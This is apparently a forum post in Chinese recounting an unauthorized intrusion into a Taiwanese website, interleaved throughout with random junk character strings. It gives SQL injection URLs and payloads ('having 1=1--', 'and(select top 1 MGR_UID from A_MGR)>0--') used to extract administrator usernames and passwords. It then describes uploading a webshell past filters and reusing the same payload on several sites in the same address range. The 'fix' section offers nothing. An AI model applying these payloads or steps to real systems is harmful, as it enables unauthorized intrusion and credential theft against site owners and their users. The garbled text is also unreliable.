发现一个注入点
- g/ n% x& l( Z2 N+ j0 @* Mhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389. C9 F4 q$ ^# I6 V6 m0 P0 b
\ }) D4 ~6 ] O3 ?$ C8 b+ b习惯性的加’having1=1--: s% E0 u7 L1 C5 r% ~5 v
6 z- X- `) c: ]* Z* s+ M! W
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
2 s0 l( Y4 d# [! g- k# M
) o9 t7 B4 ^' Q3 X% A& L7 f04 f+ [+ |; h7 K0 S# X& i3 O7 W
q7 G0 g+ {2 p6 d! G- Q爆出Diary_A.dl_Title(这时候很激动啊)% w( A0 N; g- i
" ` j# U3 v9 S, r& H/ ?那么继续
@( A6 } ]! j0 ]http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—0 Z7 A2 v0 u! p1 _+ e
# W. V1 t2 I1 d* F
继续,一直爆下去% N7 }( `$ d& A/ |
# d5 a3 H: F0 \1 [3 N爆到几个字段和表段 但是没找到需要的管理用户的字段
, Q* l6 R7 }: X
1 w0 N6 s! }0 u蛋疼了 怎么办 然后去后台登陆页看源码, ~2 V1 j% ^+ u) t0 \ m( @
' L& g" [' _( l! G" M& f6 {03 P, {1 J4 m% i0 g0 _
0 k W% r# Z" g& H( }2 kInput name= “ADUID”
0 B) P! b0 A5 ?9 E) |, X ?* XInput name= “ADPWD”
4 H: @9 E0 e' J* G$ J1 V
) t0 y0 T: M; e9 F4 e4 \- ~很幸运 找到了字段那就继续
9 L$ ?; D& o5 G' G' b/ P* Q% Q找到之后开始爆用户* Z, X B6 @, d2 S& k- y- Q
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—2 s! F) x6 J7 l
爆密码
" E0 d8 X \5 Thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—9 d1 S/ W4 |( R; ? i
测试了下 这个注入点只能爆到文章哪里的表 / `, N$ i' i, g- n$ C% h' B; D) k
% z/ p" F4 Z, U- J E7 o头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了' A- Z) L" E: w1 F1 @% |! R. h
5 v Z$ Z, w' [& U# v" g# H$ g
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了5 N- V [8 ^# Y1 X. c# k6 w5 \
5 j; m D; ^6 x" @: I
473
0 G6 n: f$ G3 T8 r$ o& G
- C& `" j2 o5 m0 b& g% S进后台/ V8 y" c- A! b
( P8 A3 } t6 M( C0 j1 R# _3 v% b3 X! \
发现几个上传点 有的地方不能上传 而且防止恶意代码' s) ?- T/ ^& I/ N2 H4 n6 J
- F: ^. M- f8 J0 e! s: P
没办法 各种百度各种找大牛 找到一只好像可以突破的马8 K* l s6 A# u
) {; G" T% E4 }; I0 _
1 Z! M6 i) D/ q7 N3 s5 [
在系统管理那里直接上传 不过没有显示地址
2 Z" e' x8 ]# s) t% T2 T# K$ p' J! ?0 o. [& p
再上传一次 抓包 搞定OK5 T z% O' @1 `
' M& c. \; |& N5 z
* f: e7 ]1 x& q
; U5 f, z4 ?9 U- p/ i% I: _7 N- N472
, w }5 S0 I$ g I# Z. G. l$ \- c9 D( v) k* x; G9 B+ g
晚上不行了 去睡觉。。。) ?5 Q% N. ]7 Z( N/ z5 E
第二天刚起床 闲的没事做继续日站吧
6 Z' L% t0 K' j/ C/ [; j9 `
2 W. J j4 X1 v4 h3 ~找个站 就把这个站的旁c扫了下% N: O! ~, z X L; r
- n' d- h0 q. c, ]6 G发现c段也有一个购物站 ,然后还和这个站的模板差不多8 A4 U+ U' d' v% q
8 A, R3 [+ t5 c& _# h3 F就找到会员登录口测试
$ v! X X" g9 u6 C; F/ c1 B* |* y1 Q$ B) D4 ]5 u
'and (select top 1 MGR_UID from A_MGR)>0—
( }2 h' D* e+ u8 g! g+ O- K% j" i果断爆到了 这时候我很激动 通杀
: J7 ~# {: g }
5 \* N$ y7 I! _* U再次翻c段
6 B" |$ H3 T/ G% F$ `. V
$ F9 C/ O4 O8 v3 M: }" z翻出几个站 都成功拿下
; Y. C8 j# |+ z6 k. ?; J0 }5 o" y; p$ U& u4 B# b- }
) ?( j+ ]& y+ O- [/ k
+ f" d4 m7 N2 d% Y7 X: ~修复方案:
0 @4 ]9 n4 w$ ^. L1 t- u他们比我专业
$ J: f5 @3 Z; {# @# `3 I# i, a" i" Y% b) x J4 V c6 c! u' L
% [& h9 x- ?1 R4 M
. [, Q% j1 ^8 y |